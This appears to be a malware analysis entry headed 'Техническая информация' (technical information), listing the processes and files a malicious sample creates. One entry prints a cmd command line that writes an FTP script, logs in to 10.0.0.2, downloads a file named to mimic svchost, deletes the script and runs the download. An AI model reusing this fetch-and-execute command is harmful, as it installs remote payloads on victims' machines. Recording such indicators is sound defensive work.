Техническая информация
- 'C:\1\sl.exe'
- '<SYSTEM32>\cscript.exe' <SYSTEM32>\rpmd.vbe "10.0.0.2" "" "" "cmd /c @echo open 10.0.0.2 21>>n1et.txt&@echo 123>>n1et.txt&@echo 123>>n1et.txt&@echo get ssvchos.exe c:\ssvchos1.exe>>n1et.txt&@echo bye>>n1et.txt&@ftp -s:n1et.txt&del n1et.txt&c:\ssvchos1.exe&c:\ssvchos1.exe&c:\ssvchos1.exe">>over.txt"
- %WINDIR%\Explorer.EXE
- <LS_APPDATA>\VirtualStore\Windows\System32\CHKenFTP.ini
- C:\1\sa.dll
- C:\1\sl.exe
- C:\1\sl.exe в %TEMP%\_@DC3A.tmp